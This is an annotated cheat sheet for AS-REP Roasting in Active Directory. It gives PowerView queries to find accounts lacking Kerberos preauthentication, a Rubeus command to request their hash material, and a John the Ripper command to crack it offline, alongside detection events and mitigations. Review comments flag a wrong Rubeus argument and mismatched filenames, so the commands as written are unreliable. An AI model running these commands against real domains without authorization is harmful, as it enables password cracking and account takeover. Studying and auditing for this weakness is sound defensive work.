AS-REP Roasting

# Identify accounts that have the "Do not require Kerberos preauthentication"
# option enabled (the DONT_REQ_PREAUTH bit in userAccountControl). The three
# PowerView queries below are alternative ways of testing the same condition.
# The same queries serve as a defensive audit: every account they return should
# be reviewed, and the flag cleared unless there is a documented need for it.
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Get-Domainuser | Where-Object { $_.UserAccountControl -like "*DONT_REQ_PREAUTH*"} | select samaccountname, UserAccountControl

# Use AS-REP Roasting to obtain password-derived hash material for the account.
# Why it works: without preauthentication the KDC replies to an AS-REQ without
# proof that the requester knows the password, and part of that reply is
# encrypted with a key derived from the account password, so it can be guessed
# offline.
# Detection: on domain controllers, Event ID 4768 (TGT requested) with
# Pre-Authentication Type 0, especially with ticket encryption type 0x17 (RC4)
# or for many accounts from one source; Event ID 4738 records the flag being
# enabled on an account.
# NOTE(review): Rubeus documents the single-account filter as /user:, not /usr:.
# An unrecognized argument is presumably ignored, which would widen the request
# beyond the intended account; confirm the spelling before use in a scoped test.
# NOTE(review): the /outfile name here (samaccountname.txt) differs from the
# file read by the next step (johnnyhash.txt).
.\Rubeus.exe asreproast /usr:${samaccountname} /outfile:samaccountname.txt

# Crack the hashes offline with a dictionary (wordlist) attack.
# The guessing happens off the network, so account lockout and logon auditing
# never see it. The effective mitigations are requiring preauthentication, using
# long random passwords on any account that must keep the flag, and disabling
# RC4 for Kerberos where possible.
.\john.exe .\johnnyhash.txt --format=krb5asrep --wordlist=10k-wordlist.txt
